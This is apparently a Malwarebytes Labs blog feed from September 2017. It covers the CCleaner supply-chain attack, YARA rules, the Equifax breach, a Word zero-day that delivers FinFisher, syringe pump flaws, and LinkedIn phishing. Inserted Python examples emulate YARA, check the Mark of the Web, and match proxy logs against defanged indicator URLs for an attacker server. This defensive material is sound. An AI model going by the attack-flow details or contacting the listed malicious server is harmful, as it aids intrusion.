Malware Bytes

A week in security (September 11 – September 17)

Malware Bytes Security - Mon, 09/18/2017 - 6:10pm

Last week, we dug into phishing campaigns run from compromised LinkedIn accounts, remediation versus prevention, and flaws in a smart syringe pump, and advised you to patch against a Word zero-day. We also shared tips on identity theft protection after the Equifax breach, explored crowdsourced fraud, and explained YARA rules.



Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Infected CCleaner downloads from official servers

Malware Bytes Security - Mon, 09/18/2017 - 11:31am

In a supply chain attack that may be unprecedented in its number of downloads, the official servers hosting CCleaner, a popular PC cleanup tool, have been delivering a version of the software that carries malware.

What happened?

Threat actors managed to alter the files delivered by the Avast servers that host CCleaner updates. If you are wondering why CCleaner lives on Avast servers: Avast acquired Piriform, the original publisher of CCleaner, a few months ago.

The incident was discovered and reported by Cisco Talos. Piriform is aware of the situation and is acting to prevent further damage. It is also investigating how files coming from its servers were modified before being released to the public.

Possible impact

It is hard to say at this point how many users were affected, but the numbers could be huge. According to statistics published by Piriform, CCleaner has been downloaded 2 billion times in total and about 5 million times a week. The modified version, 5.33, was available from August 15 until September 12, when version 5.34 was released.

The malware

The malware collects the following information about the infected system:

  • Computer name
  • A list of installed software, including Windows updates
  • A list of the currently running processes
  • The MAC addresses of the first three network adapters
  • Other system information the malware cares about, such as whether it runs with admin privileges and whether the system is 64-bit

The malware uses a hardcoded C2 server, with a domain generation algorithm (DGA) as a fallback, to send the collected information about the affected system and fetch the final payload.

What to do if you think you are affected?

First of all, check the version of CCleaner on your system. If you downloaded, or suspect you downloaded, CCleaner version 5.33.6162 or CCleaner Cloud version 1.07.3191, scan your system for malware.

CCleaner users running older versions, or who no longer trust the one they have, are encouraged to update to version 5.34 or higher. The latest version is available for download here.

Affected versions: CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191

Malwarebytes blocks the IP and domains related to this malware. We also remove the malicious installer.

Stay safe!


Pieter Arntz


Explained: YARA rules

Malware Bytes Security - Fri, 09/15/2017 - 11:00am

YARA rules identify malware (or other files) by describing the characteristics to look for. YARA was originally developed by Victor Alvarez of VirusTotal and is mainly used in malware research and detection. It was designed to describe patterns that identify particular strains or entire families of malware.


Each rule starts with the keyword rule, followed by its name or identifier. The identifier can contain alphanumeric characters and underscores, but the first character cannot be a digit. There is a list of YARA keywords that cannot be used as identifiers because they have a predefined meaning.


Rules are composed of several sections. The condition section is the only required one: it holds a Boolean expression that determines whether the rule is true for the object (file) under investigation, and it can use all the usual logical and relational operators. You can also reference another rule from within a condition.


For the condition to have something to test, you will usually also need a strings section, where you define the strings to look for in the file. Let's look at an easy example.

rule vendor
{
    strings:
        $text_string1 = "Vendor name" wide
        $text_string2 = "Alias name" wide
    condition:
        $text_string1 or $text_string2
}

The rule above is named vendor and looks for the strings "Vendor name" and "Alias name" in their wide form (two bytes per character, as in UTF-16). If either string is found, the rule evaluates to true.

There are several types of strings you can look for:

  • Hexadecimal strings, in combination with wildcards, jumps, and alternatives.
  • Text strings, with modifiers: nocase, fullword, wide, and ascii.
  • Regular expressions, with the same modifiers as text strings.
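
To make the string types and modifiers concrete, here is an added example that is not part of the original post and is not YARA's own code: a small Python stand-in that turns YARA-style string definitions into byte patterns and evaluates a subset of the condition grammar, so you can see what wide, nocase, fullword, ?? and [n-m] jumps actually match. The sample buffers and the "dropper" rule are constructed for the demo; use real YARA (or yara-python) for anything beyond learning the semantics.

```python
import re

# Added example, not code from the post or from YARA itself: a small stand-in
# that shows what YARA string definitions and conditions mean at the byte
# level. Strings become bytes regexes; the condition evaluator covers $id,
# "any of them", "all of them", not/and/or and parentheses.

def hex_pattern(spec: str) -> bytes:
    """'4D 5A ?? [0-512] 50 45' -> regex: literal bytes, '??' wildcards and
    '[n-m]' jumps (nibble wildcards and alternatives are left out here)."""
    parts = []
    for tok in spec.split():
        if tok == "??":
            parts.append(b".")
        elif tok[0] == "[" and tok[-1] == "]":
            lo, hi = (int(x) for x in tok[1:-1].split("-"))
            parts.append(b".{%d,%d}" % (lo, hi))
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    return b"".join(parts)

def text_pattern(text: str, wide=False, ascii_=False, nocase=False,
                 fullword=False) -> bytes:
    """Text string with modifiers. 'wide' = two bytes per character (UTF-16LE),
    'ascii' = one byte; a plain string is ascii only, 'wide ascii' is both.
    'nocase' ignores case; 'fullword' forbids alphanumerics on either side."""
    forms = []
    if ascii_ or not wide:
        forms.append(re.escape(text.encode("ascii")))
    if wide:
        forms.append(re.escape(text.encode("utf-16-le")))
    body = b"(?:" + b"|".join(forms) + b")"
    if fullword:
        body = rb"(?<![A-Za-z0-9])" + body + rb"(?![A-Za-z0-9])"
    return (rb"(?i)" + body) if nocase else body

def scan(data: bytes, strings: dict) -> dict:
    """{identifier: [offsets]} for every string, like YARA's $id match lists.
    DOTALL so that '.' (from '??' and jumps) also matches the 0x0A byte."""
    return {ident: [m.start() for m in re.finditer(pat, data, re.DOTALL)]
            for ident, pat in strings.items()}

def evaluate(condition: str, matches: dict) -> bool:
    """Recursive-descent evaluation of a YARA condition subset over scan()
    output. Precedence is not > and > or, as in YARA."""
    toks = re.findall(r"\(|\)|\$\w+|\w+", condition)
    pos = 0
    def take():
        nonlocal pos
        pos += 1
        return toks[pos - 1]
    def atom():
        t = take()
        if t == "(":
            v = expr()
            take()  # closing ')'
            return v
        if t == "not":
            return not atom()
        if t in ("any", "all"):
            take(); take()  # the words 'of them'
            return (any if t == "any" else all)(bool(v) for v in matches.values())
        if t[0] == "$":
            return bool(matches[t[1:]])
        raise ValueError("unsupported token %r" % t)
    def conj():
        v = atom()
        while pos < len(toks) and toks[pos] == "and":
            take()
            v = atom() and v  # evaluate both sides so tokens are consumed
        return v
    def expr():
        v = conj()
        while pos < len(toks) and toks[pos] == "or":
            take()
            v = conj() or v
        return v
    return expr()

def rule_matches(data: bytes, strings: dict, condition: str) -> bool:
    return evaluate(condition, scan(data, strings))

# The post's "vendor" rule, expressed with the helpers above.
VENDOR_STRINGS = {"text_string1": text_pattern("Vendor name", wide=True),
                  "text_string2": text_pattern("Alias name", wide=True)}
VENDOR_CONDITION = "$text_string1 or $text_string2"

# A second, hypothetical rule: MZ header followed by a PE signature within
# 512 bytes, plus the word "payload" in any case, not glued to other letters.
DROPPER_STRINGS = {"mz_pe": hex_pattern("4D 5A [0-512] 50 45 00 00"),
                   "tag": text_pattern("payload", nocase=True, fullword=True)}
DROPPER_CONDITION = "$mz_pe and $tag"
```

rule_matches(b"\x00" + "Alias name".encode("utf-16-le"), VENDOR_STRINGS, VENDOR_CONDITION) is true, while the same call on the plain ASCII bytes b"Alias name" is false, because the post's rule uses wide only; adding the ascii modifier to the definition (ascii_=True) makes both match. The dropper rule matches a constructed buffer such as b"MZ" + 120 filler bytes + b"PE\x00\x00 drop PAYLOAD here" but not one containing "payloads", which is what fullword is for.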

There are many more advanced conditions you can use, but they are outside the scope of this post. If you would like to know more you can find it in the YARA documentation.


A meta section can hold metadata that helps identify the files picked up by a rule and documents the rule itself. Each metadata identifier is followed by an equals sign and its value, which can be a string, an integer, or a Boolean. Identifier/value pairs defined in the meta section cannot be used in the condition section; their only purpose is to store additional information about the rule.


YARA is a tool for identifying files that meet certain conditions. It is used mainly by security researchers to classify malware.


Signature-Based Detection With YARA

Latest YARA documentation

YARA: Simple and Effective Way of Dissecting Malware

Screenshots were made using Yara Editor by Adlice Software

Pieter Arntz


Crowdsourced fraud and kickstarted scams

Malware Bytes Security - Thu, 09/14/2017 - 12:00pm

Crowdsourced funding opportunities via Kickstarter, Patreon, and GoFundMe have removed many structural roadblocks for people to access capital quickly and conveniently. But they’ve also lowered the barrier to entry for many very old scams. So how do you tell the difference between a great cause or project to contribute to and a digital confidence scam? What’s outright fraudulent, and what’s just a company with poor organizational skills? Let us take a look at pitfalls on two crowdfunding platforms.

GoFundMe primarily serves personal projects and donation pages, or other campaigns that otherwise don’t fit the more common commercial model found on Kickstarter. Funding requests cover a wide range of needs, from community sports groups to disaster relief, to education and medical care (for US users). It sounds like a great use of crowdfunding, but when it comes to fraud, things start to get a little iffy. Here’s what GoFundMe’s terms of service (ToS) have to say about its giving campaigns.

GoFundMe has no control over the conduct of, or any information provided by, a Campaign Organizer or a Charity, and GoFundMe hereby disclaims all liability in this regard to the fullest extent permitted by applicable law.

So as far as they're concerned, buyer beware. But as a platform, they do have some minimal obligations, as well as some additional rules to avoid running afoul of onerous regulations. To summarize their ToS, here's what you can't raise money for:

  • Drugs
  • Weapons
  • Any financial product
  • Gambling
  • Hate speech
  • Porn
  • Legal defense
  • Fraud

But wait a minute: how can fraud be on the list if they say they won't vet campaigns? Because these categories are largely about liability and are included to absolve the platform of after-the-fact responsibility. The first four categories can put GoFundMe under regulatory scrutiny, however, and are most likely patrolled by counter-fraud algorithms. If you'd like to know what GoFundMe considers fraud, you can go to their page on the subject, which oddly says nothing on the matter. They do have a fraud report form, but it requires proof of intentional deception on the part of the organizer. You can go to for examples of how difficult that is.


Kickstarter does a little bit better regarding fraud, requiring that the creators have an actual production plan and prototype to show backers, and prohibits an extensive list of backer rewards. Most important is the list of creator requirements, in particular:

You [must] have an address, bank account, and government-issued ID based in the country that you're creating a project in.

This single requirement raises the barrier to entry for most scammers and gives Kickstarter the tools to track down and permanently deal with scams that make it onto the platform. Further, they claim to vet projects against company guidelines before they go live. This works well against the vast majority of blatantly fraudulent online scams. Their track record on projects whose vetting requires domain expertise is considerably worse.

SecuritySnakeOil.Org is a site devoted to scammy information security projects on Kickstarter. Most of the projects it reviews combine open source hardware or software, expansive marketing claims, and entry-level security flaws. From "unhackable" routers made from a Raspberry Pi running a years-old build of Debian to products that advertise "A custom operative system (OS) to avoid hacking", what most of these share is that they cannot be vetted properly without domain expertise. That is, if you don't know anything about the field, you would have difficulty evaluating their marketing claims, and the project creators don't do a lot to help.

Even more legitimate projects, such as this Wi-Fi router with a built-in VPN that blocks ads at the perimeter (neat!), provide no details about any specific technology used in the product. So without adequate, accessible information on what you're backing, how can you possibly make a safe choice?

What to do about it

Both GoFundMe and Kickstarter offer organizers the ability to link their Facebook account to their pitch. For GoFundMe, this lets you see whether the organizer is, in fact, someone connected to the cause and in a reasonable position to get the funds to the right place. For Kickstarter, Facebook can provide a name to look up an organizer's employment history (or lack thereof). But a better question to ask about a project involving an actual product is this: are the owner's claims physically possible?

And lastly, the question that has protected people from fraud for time immemorial: Is this too good to be true?


Equifax aftermath: How to protect against identity theft

Malware Bytes Security - Thu, 09/14/2017 - 11:00am

Who here is scrambling around in the aftermath of the recent breach at Equifax to figure out if you’ve been compromised? Who here is wondering what to do about it if you are? If you’re one of the 143 million Americans whose data was accessed by cybercriminals, then you probably raised your hand.

Even if you weren’t one of the 143 million, you might still want to take some precautions. You could instead be part of the millions of folks who’ve had their data stolen over the course of online history. Basically, if you have a social security number, have ever run a credit check, or have a pulse, you should listen up. Why? Two words: identity theft.

What could happen?

The Equifax breach gave criminals access to vital personal information, including names, Social Security numbers, birthdates, addresses, and in some cases driver's license numbers and credit card numbers. Here's just a slice of what those jerks can do with that data:

  • Open financial accounts
  • Apply for credit cards, mortgages, and other financial services
  • Get medical care at your expense
  • File for a tax refund in your name
  • Get a job in your name and let you pay the taxes
  • Steal your benefits
  • All of the above (aka, identity theft)

Who is impacted?

The better question might be, who isn't? Don't worry about verifying whether your data was stolen; assume it was. This was a decent rule of thumb even before the Equifax breach, and right now it is pretty much impossible to verify whether you've been impacted anyway.

The Equifax verification site is currently not returning accurate information. And if you try calling the company now, you might be met with some long waiting times to receive frustratingly vague answers. So if you want to act quickly (and we recommend you do), just bypass the first four stages of grief and go directly to acceptance.

What we do know: Those affected by the breach are predominantly from the US, but there are people from Canada and the UK impacted as well. Some methods that work in one country may not work in others, so please keep in mind that this article is aimed at our US readers. International readers can find some additional information about what to do here.

Steps to protect yourself

Our recommendation is to freeze your credit immediately with all three of the major credit bureaus. By freezing your credit, you’ll prevent criminals from trying to open up new accounts in your name—all of your current credit cards will still work. You’ll only need to consider unfreezing your credit if you want to apply for a loan, open a new credit card, or make any type of purchase that requires a check on your credit.

Two things you’ll want to know before contacting the credit bureaus.

One: the cost is minimal. Reports have varied, and Equifax is offering its credit freeze for free (though it's hard to get through to them), but freezing credit usually costs a one-time fee of about $10 per bureau. That's 20 or 30 bucks for a whole lot of peace of mind.

Two: You must set or receive PINs when freezing your credit. Save these in a secure location, whether that’s using a password manager or physically storing the printed PIN paper someplace safe and out of sight.

Where to go to freeze your credit

In addition, you should get your credit report, free and without upsells, here.

Our recommendation is to pull only one report now, another one in four months, and the third in another four months. It’s not foolproof, but it will allow you to see different reports throughout the year to track any potential changes.

Additional monitoring services

The use of additional monitoring services is entirely up to you. The biggest issue is that both legitimate companies trying to help and scammer companies trying to trick will over-hype the danger of identity theft in order to make a sale. Please make sure that you do your homework and research on these companies before signing up blindly out of fear.

When looking up information about how to protect yourself in situations like these, turn to sites like the Federal Trade Commission or technology publications such as Wired, The Verge, or Vice's Motherboard, as they won't be trying to upsell you credit protection you may or may not need. The wrong company might actually hurt your ability to stave off ID theft.

General best practices

We wish we could say that the advice above will save you from all the dangers associated with this breach. A credit freeze covers new-account credit fraud, but for all the other threats from scammers and fraudsters looking to capitalize on this situation, here are some additional guides on how to avoid their traps.


Be on the alert for credit scams or any related terms. You’ll see these in emails, ads on social sites or games, and even physical mail to your home. These attacks are part of what we refer to as social engineering, and they will run rampant for many months and years to come. Always be skeptical, and if you’re not sure about something, ask a professional.

Phone or text scams

Since your data was most likely taken, your phone number will be shared even more widely than it already is. Calls and texts from unknown numbers, from numbers with your area code, or from numbers very similar to yours should be treated as potential scams.

You might think that the National Do Not Call Registry would protect you from this. Sadly, it does not. It offers protection from legit companies trying to solicit your business. It does not offer protection against scammers. (Because why would criminals follow the law, anyway?)

my Social Security account

The my Social Security account lets you keep track of the Social Security benefits you'll collect in the future. Although it was not affected by the Equifax breach, it's good practice to set up this account in your name now, because someone else holding your data could register it first and lock you out of your future payments. Literally make an account (using the password guidance below) and never use it again.

Passwords and two-factor authentication

Ensure you're using a smart password strategy (long, unique, never reused across sites or services), and enable two-factor authentication (2FA) on every account that offers it. You can check 2FA availability for your sites and services here.

Enable alerts on your accounts

While your current accounts shouldn’t be impacted by this breach, it’s never a bad idea to keep an eye on your bank accounts and credit cards for larger purchases. For accounts rarely used, you could set alerts to $1 so you’re notified the second any transaction happens. For regular accounts, set the alerts to a dollar amount that would seem out of place for that card, whether it’s $20 or $500.

New phone accounts

A common attack vector after credit/personal data breaches is adding new phone lines to your account with your carrier. Once criminals have your info, they call the phone company, say they want to add a line, and claim they don't have a PIN. If you haven't set up a PIN with your carrier, it has no other way to verify the account. So guess what? BAM! There's a new phone on your bill. To protect yourself from this type of attack, set up a PIN with your provider.


File your tax return as soon as possible next year! For years we've heard about victims of tax return fraud, wherein a scammer using your personal information files YOUR return before you can. So don't wait on this one.


If you're affected by the Equifax breach, you have a heightened risk of becoming a victim of identity theft. But at this juncture, the point is moot: since it's difficult to get a definitive answer, it's best to assume you are affected and deal with the fallout.

We’ve given you some direction on what to do to avoid identity theft and credit fraud, and we hope you take a deep breath, crack your neck, and get to work nailing your personal info down. One new credit card created by an attacker in your name is going to cause a massive headache. Better to stay ahead of it than spend the next month trying to convince a bank that you didn’t open an account. Good luck, be vigilant and stay safe.


The Malwarebytes Labs team


PSA: New Microsoft Word 0day used in the wild

Malware Bytes Security - Wed, 09/13/2017 - 6:49pm

Microsoft has just patched an important vulnerability exploited through Microsoft Word documents during its latest Patch Tuesday cycle. According to the security firm that found it [1], this zero-day (CVE-2017-8759) was used in targeted attacks to install a piece of malware known as FinFisher.

Microsoft Office has been in the line of fire all year, with malware distributors using various social engineering techniques to trick users into opening booby-trapped documents laced with exploits or macros. Indeed, while exploit kit activity has plummeted, malicious spam has become the dominant threat.

In this blog post, we do a quick review of this latest exploit and how future attackers are likely to add it to their own campaigns.

Infection flow

CVE-2017-8759 is an input validation flaw in the .NET Framework's parser for Web Services Description Language (WSDL) documents that leads to code injection and arbitrary code execution. As we have seen many times in previous attacks, mshta.exe is used to retrieve a script and, eventually, the malware payload.

Figure 1: Traffic view showing script and payload retrieval

Figure 2: Process view showing infection technique

Payload delivery implications

Depending on how the malicious document is delivered, it can require little or no user interaction to infect the target. In the first case, the document is downloaded from a website or arrives as spam: it bears the Mark of the Web (MotW) and is flagged. In the second case, where the document was packaged, for example in a 7zip archive, it can lose that MotW [2].

Figure 3: Side-by-side comparison of the same file, distributed differently.

In the first case, the document opens in Protected View and the user is prompted to click Enable Editing to leave it (which admittedly looks less suspicious than enabling macros). Doing so triggers the malicious code.

Figure 4: CVE-2017-8759 attempt blocked (Protected View mode)

In the second case, where the MotW has been lost, the malicious Word document will immediately run its payload:

Figure 5: CVE-2017-8759 attempt blocked (normal mode)
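
The "second case" above is worth being able to check for yourself. The Mark of the Web is the Zone.Identifier alternate data stream NTFS attaches to a downloaded file, and the following is an added example (not from the post, and not tied to any Malwarebytes product) that reads and interprets it. The stream text in the test is constructed; the zone numbers and the default Protected View behaviour for the Internet zone are Windows and Office facts, everything else here is the example's own choice.

```python
import re

# Added example, not from the post. Office opens a document in Protected View
# when its Zone.Identifier stream says it came from the Internet zone (3) or
# the Restricted zone (4). A file extracted by a tool that does not propagate
# the stream has no MotW at all and opens in normal mode.

ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted",
              3: "Internet", 4: "Restricted"}

def parse_zone_identifier(stream_text: str):
    """ZoneId from the INI-style stream text, or None if it is absent."""
    m = re.search(r"^\s*ZoneId\s*=\s*(\d+)", stream_text, re.M)
    return int(m.group(1)) if m else None

def zone_of(path: str):
    """Read <path>:Zone.Identifier (NTFS alternate stream). A file without
    the stream, or on a non-NTFS volume, yields None: no Mark of the Web."""
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:
        return None

def opens_in_protected_view(zone) -> bool:
    """Default Office Trust Center policy: Protected View for the Internet
    zone or anything more restrictive; nothing for an absent MotW."""
    return zone is not None and zone >= 3

def describe(path: str) -> str:
    zone = zone_of(path)
    if zone is None:
        return "%s: no Mark of the Web (opens without Protected View)" % path
    mode = "Protected View" if opens_in_protected_view(zone) else "normal mode"
    return "%s: ZoneId=%d (%s), opens in %s" % (
        path, zone, ZONE_NAMES.get(zone, "unknown"), mode)

if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(describe(p))
```

Run it on Windows against a document saved straight from a browser and against the same document after extracting it from an archive; the first reports ZoneId=3, the second reports no Mark of the Web, which is exactly the difference between Figure 4 and Figure 5.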

If you haven't done so yet, we strongly advise you to run Windows Update and apply the latest security patches. If experience is any guide, each time a new zero-day is exposed, other online criminals jump in and rush to add it to their arsenal, so what was a small and targeted attack can all of a sudden become a widespread campaign.

Malwarebytes users were already protected against this exploit when it was still a zero-day and we also detect and block the FinFisher malware payload.


[1] FireEye

[2] Eric Lawrence

Indicators of compromise

Malicious Word document:




Network traffic:

91.219.236[.]207/img/office.png
91.219.236[.]207/img/word.db
91.219.236[.]207/img/left.jpg
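
To put the indicators above to use, here is an added example that is not part of the post: it refangs the defanged entries and sweeps proxy log lines for them, reporting an exact URL hit separately from a weaker host-only hit. The space-separated log layout (timestamp, client, method, URL, status) is an assumption made for the demo rather than any vendor's format, and the sample lines are constructed.

```python
import re
from dataclasses import dataclass

# Added example, not part of the post: refang the defanged indicators listed
# above and sweep proxy logs for them. The log layout (timestamp, client,
# method, url, status) is an assumption for the demo; sample lines are made up.

DEFANGED_IOCS = [
    "91.219.236[.]207/img/office.png",
    "91.219.236[.]207/img/word.db",
    "91.219.236[.]207/img/left.jpg",
]

def refang(ioc: str) -> str:
    """Undo the usual defanging so an indicator can be compared to real traffic."""
    return (ioc.replace("[.]", ".").replace("[:]", ":")
               .replace("hxxps://", "https://").replace("hxxp://", "http://"))

def split_url(url: str):
    """(host, path) with scheme, port and query removed; host lower-cased."""
    url = re.sub(r"^[a-z][a-z0-9+.-]*://", "", refang(url), flags=re.I)
    host, _, rest = url.partition("/")
    return host.split(":")[0].lower(), "/" + rest.split("?")[0]

@dataclass
class Hit:
    line_no: int
    client: str
    url: str
    confidence: str  # "url": exact indicator; "host": same host, other path

def match_logs(lines, iocs=DEFANGED_IOCS):
    """One Hit per log line that touches an indicator. A host-only hit is
    still worth triage: the same server can serve stages not in the list."""
    exact = {split_url(i) for i in iocs}
    hosts = {h for h, _ in exact}
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed or truncated line: skip rather than crash
        client, url = fields[1], fields[3]
        host, path = split_url(url)
        if (host, path) in exact:
            hits.append(Hit(n, client, url, "url"))
        elif host in hosts:
            hits.append(Hit(n, client, url, "host"))
    return hits

# Constructed proxy log lines for the demo (not real traffic).
SAMPLE_LOG = [
    "2017-09-13T10:02:11Z 10.0.0.15 GET http://91.219.236.207/img/office.png 200",
    "2017-09-13T10:02:12Z 10.0.0.15 GET http://91.219.236.207/img/word.db?v=1 200",
    "2017-09-13T10:02:30Z 10.0.0.22 GET http://example.com/img/left.jpg 200",
    "2017-09-13T10:05:01Z 10.0.0.15 GET http://91.219.236.207:80/other/p.html 404",
]

if __name__ == "__main__":
    for hit in match_logs(SAMPLE_LOG):
        print(hit)
```

On the sample, lines 1 and 2 are exact hits (the query string on line 2 is ignored), line 3 is not a hit because only the path matches, and line 4 is a host-level hit from the same client, which is the kind of follow-on traffic you would pivot on during incident response.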


Multiple flaws found in smart syringe pump

Malware Bytes Security - Wed, 09/13/2017 - 12:27pm

A syringe pump is a small infusion pump that delivers liquids, either medication or nutrients, in small, precise quantities into a patient's system. Hospitals, nursing homes, and homes with residents under acute or palliative care use them. Accurate and safe delivery of doses from a variety of syringes makes such a device essential. Unfortunately, a particular model of wireless smart pump has been found to be so vulnerable that a highly skilled, malicious attacker could compromise its communications and therapeutic modules, which in turn could compromise a patient's well-being.

Late last week, the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) released an advisory for the Medfusion 4000 Wireless Syringe Infusion Pump after Scott Gayou, an independent security researcher, brought to light multiple vulnerabilities in the device that can be exploited remotely.

According to Gayou, the pump has problems with the way it processes data, which could lead to unauthorized code execution or a crash. He also pointed out that several credentials are hard-coded into the pump, some of them accessible to anyone who modifies the pump's communication module. Furthermore, the pump does not validate certificates, making it a good candidate for man-in-the-middle (MitM) attacks that let threat actors bypass the security measures in place and gain elevated privileges on it.

Medfusion 4000 Wireless Syringe Infusion Pump versions 1.1, 1.5, and 1.6 are affected by these vulnerabilities.

Smiths Medical, maker of the pump, has announced that it will release version 1.6.1 of the product to address the vulnerabilities above. In the meantime, ICS-CERT has advised Medfusion 4000 users to take steps to reduce the chance of exploitation; one recommendation is to disconnect the pump from the internet altogether.

Smiths Medical and ICS-CERT provided more mitigation steps in this advisory.


The Malwarebytes Labs Team


Remediation vs. prevention: How to place your bets

Malware Bytes Security - Wed, 09/13/2017 - 11:00am

Building a security environment for businesses these days is a gamble: layer on too much and your programs may be canceling each other out or causing redundancy (and your leaders may be wondering why you’re spending so much). Invest too little and get breached: it’s snake eyes for you. Whether you choose remediation, proactive prevention, or both, finding the right balance is the key to a winning hand.

What is remediation?

Remediation is the process of correcting changes made to a system, for example removing threats from an infected machine. Such threats bypassed existing security measures and have likely already caused damage; the goal is to remove them before they cause more.

In most cases, threats have made themselves known in some malicious fashion, making the need to remove them urgent. But the remediation process can potentially last anywhere from hours to days depending on the tools at hand and the resources dedicated to the process.

What is proactive prevention?

Proactive prevention is the ability to block the latest threats before they reach a system or network and cause damage. This form of protection requires technologies that detect and block unknown threats.

This is the most effective approach for dealing with ransomware. Once ransomware gets onto a system and encrypts the victim's data, a ransom demand requires swift payment in digital currency in exchange for the decryption key. Paying, however, does not guarantee you'll get your data back.

In rare cases, decryption programs or algorithms (decryptors) are available thanks to the valiant efforts of security researchers. Unfortunately, this reactive approach offers too small of a ray of hope in comparison to the sheer number of ransomware variants that continue to hit the streets every week.

Why are businesses sticking with remediation? Cost

Remediation tools, by nature, are less expensive than full protection. In addition, some businesses are adding remediation tools to run alongside their existing security measures. Due to budget constraints, many IT/Network Administrators wait before deciding on a full protection product.

For instance, a company of any size may be running an existing tool, like antivirus, with a three-year subscription. It may be easier for the company to let the contract run out before purchasing a new, more inclusive product. In this type of situation, adding a remediation tool to the existing security stack provides an additional, incremental value to security capabilities.

SMBs playing the odds

Many businesses assess their potential risk and exposure to attack, and many, especially smaller ones, tend to believe there is little chance of an attack happening to them. In a survey of over 2,000 small businesses conducted by CNBC and SurveyMonkey, only 2 percent of small business owners said they viewed a cyberattack as the most critical issue they face. However, in the last year, malware detections increased more than 165 percent among SMBs.

With limited resources or a short-handed IT staff, small to mid-size businesses also face especially tight budgets on top of risk evaluation, so they need to allocate their spending accordingly. This is what they’ve always done, and they are not alone. Dell recently released a study that stated 53 percent of IT decision makers say cost is one of the biggest constraints to taking additional security measures.

Many believe it is easier to remediate a few errant incidents than to find several security solutions to combat various strains of malware. However, security incidents are increasing in frequency not only at enterprise-level businesses but also among small to mid-size businesses. Malwarebytes' recent report, Analysis of Malware Trends for Small to Medium Businesses Q1 2017, found that ransomware incidents alone rose 231 percent within the last year among SMBs.

Worst-case scenario

Ransomware is a concern for those relying on remediation alone because its damage cannot be undone unless a decryptor exists or clean backups are available. Businesses on a tight budget could compare the cost of proactive prevention tools to the potential ransom demands from a ransomware attack and the projected downtime in productivity. But even that estimate is tricky because there's no guarantee cybercriminals will provide you with a key, process the transaction, or deliver clean code.

However, even if files are restored, the system or network can still be vulnerable, because ransomware can leave remnants behind or the attacker may have planted additional malicious code to use later. Other options include fully wiping and rebuilding machines and restoring from backups stored elsewhere, but that takes a lot of time, especially if multiple endpoints were impacted.

If a cyberattack were to hit an unprepared business, it can be a devastating event, causing a loss in productivity, loss of revenue, and even cause damage to the company’s reputation. For malware attacks other than ransomware, remediation tools are useful to run a full scan cleaning damage after the infection. But the truth is this: The remediation-only approach will simply not protect against a major ransomware attack.

How businesses benefit from proactive prevention

Threats continue to evolve, and traditional security solutions are nearly obsolete against the newest ones. To block these threats effectively, security has to evolve as well. Here's how the proactive approach benefits businesses:

1. It avoids risk and damage to endpoints.

With a proactive prevention tool, businesses see the value from the reduction in threat exposure. The less threat exposure, the less risk to the business.

2. It reduces/eliminates manual threat removal.

Forty-five percent of SANS survey respondents say that their prevention, detection, response, and remediation processes are still mostly or completely manual. With a proactive prevention tool, businesses drastically reduce the need for manual threat removal because threats are caught earlier and there are far fewer remediation demands.

3. It reduces downtime.

It was discovered in the Osterman report that more than 60 percent of attacks take organizations more than nine hours to remediate. This is because of the need to manually remove threats as well as re-image machines where necessary. Without the manual process, time to remediate, or downtime, is significantly reduced.

4. It enables expert staff to focus on critical issues.

Remediation or reactive methods often require valuable resources and create a crisis due to the complexity of each threat. The administrator who removes the threats needs to have a certain level of expertise—often requiring skills that only few have. In Frost & Sullivan’s 2015 Global Information Workforce Study, researchers predict that there will be a shortage of 1.5 million information security experts by 2020, so the pool of talent is only getting smaller.

The shortage of capable admins compounds the problem of threat removal, because it is rarely as easy as clicking one button to disinfect the entire network; it can take hours to days away from productivity. That time could be spent on more valuable projects if admins only had to run periodic scans to proactively check for anomalies.

Why do I have to choose?

You don’t have to choose. Remediation alone might not pass muster against large-scale attacks, but it is a great help when threats slip through the cracks. If you’re looking to add a layer of security to your existing tool belt, we recommend a strong remediation tool for post-incident cleanup and some peace of mind. Proactive prevention, on the other hand, stops an attack before an infection occurs, avoiding risk and reducing damage.

Remediation tools, like Malwarebytes Incident Response, can be deployed on top of existing traditional approaches to provide peace of mind for those “what if” cases where your existing security measures fail. A product that delivers both, like Malwarebytes Endpoint Protection, ensures multiple attack vectors are covered from the start.

The post Remediation vs. prevention: How to place your bets appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Compromised LinkedIn accounts used to send phishing links via private message and InMail

Malware Bytes Security - Tue, 09/12/2017 - 1:24pm

Phishing remains criminals’ favorite way to harvest user credentials with more or less sophisticated social engineering tricks. In this post, we look at a recent attack that uses existing LinkedIn user accounts to send phishing links to their contacts via private message, and to external members via email.

What makes this campaign interesting is the abuse of long-standing, trusted accounts that were hacked, including Premium membership accounts with the ability to contact other LinkedIn users (even those who aren’t direct contacts) via the InMail feature. The fraudulent message references a shared document and includes a link that redirects to a phishing site for Gmail and other email providers, which asks potential victims to log in.

Those who proceed will have their username, password, and phone number stolen, but won’t realize right away that they were duped. Indeed, this phishing scam ends on a tricky note with a decoy document on wealth management from Wells Fargo.

Private message

This message was received from a trusted, existing contact, although the time stamp shows 12:17 AM, which is perhaps one of the red flags to note. The message mentions a shared Google Doc and links to it via a URL shortener.

Figure 1: An instant message from a contact directing to a phishing scam

Behind the shortened URL redirection

URL shorteners are a well-known vehicle for spreading malware and phishing scams, but they also serve legitimate purposes, especially on social media where long URLs are cumbersome. In this attack, the perpetrators abuse both a shortener and a free hosting provider to redirect to the phishing page, itself hosted on a hacked website.

Figure 2: The redirection flow behind this phish

Phishing for email credentials

This particular page is built as a Gmail phish but will also ask for Yahoo or AOL usernames and passwords. The main page is followed by a request for a phone number or secondary email address, and ultimately the user sees a decoy Wells Fargo document hosted on Google Docs.

Figure 3: The phishing template, harvesting credentials and showing decoy content


Attackers are also abusing LinkedIn’s trusted InMail feature to send the same phishing link. According to LinkedIn, “InMail messages are sent directly to another LinkedIn member you’re not connected to.” This widens the scope of the attack from the compromised account’s own contacts to other users as well.

